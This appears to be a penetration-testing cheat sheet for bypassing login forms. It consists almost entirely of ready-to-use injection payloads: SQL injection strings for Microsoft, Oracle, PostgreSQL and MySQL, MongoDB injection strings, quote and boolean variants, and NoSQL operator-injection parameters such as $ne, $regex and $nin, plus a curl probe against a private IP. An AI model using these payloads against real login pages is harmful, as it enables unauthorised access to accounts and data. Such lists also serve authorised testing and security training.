Login bypass

#With curl

#Use the -I flag
curl -I  "http://192.168.101.105/item/viewItem.php?id=5" 

#Try:

whatever' or '1'='1

' or '1'='1
-----------------------------------

#Microsoft, Oracle, PostgreSQL

admin'--
admin' or 1=1--
admin' or '1'='1'--

admin}" or 1=1--

----------------------------------

#MongoDB-specific injection

' || 1==1 %00
admin' || 1==1//
admin' || 1==1%00
admin' || '1==1
admin' || '1'=='1

----------------------------------

#MySQL

admin'-- -
admin'#

admin' or 1=1#
admin' or 1=1-- -

admin' or '1'='1'-- -
admin' or '1'='1'#

admin}" or 1=1-- -

----------------------------------

#Extra stuff

-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x


----------------------------

#Operators

# $ne: Not equal
username[$ne]=xyz&password[$ne]=xyz

# $regex: Regular expressions
username[$regex]=.*&password[$regex]=.*
username[$regex]=^xyz&password[$regex]=^xyz
username[$regex]=^a.*$&password[$ne]=xyz
username[$regex]=.{6}&password[$ne]=xyz
username[$regex]=^.{1}&password[$regex]=^.{1} # Length of values

# $exists: Field exists in the document
username[$exists]=true&password[$exists]=true

# $nin: Not in (value is not in the given list)
username[$nin][admin]=admin&password[$ne]=xyz
# If we find that "admin" exists, we can exclude "admin" by specifying the $nin operator.
username[$nin][]=admin&password[$ne]=xyz
# If more users are found, we can exclude them as well.
username[$nin][]=admin&username[$nin][]=john&password[$ne]=xyz

# $gt: Greater than
username[$gt]=s&password[$gt]=s
# $lt: Less than
username[$lt]=s&password[$lt]=s

# Combinations
username[$ne]=xyz&password[$regex]=.*
username[$exists]=true&password[$ne]=xyz
username[$ne]=xyz&password[$exists]=true
username[$regex]=.*&password[$ne]=xyz
username[$ne]=xyz&password[$regex]=.*
username[$regex]=.{6}&password[$ne]=xyz
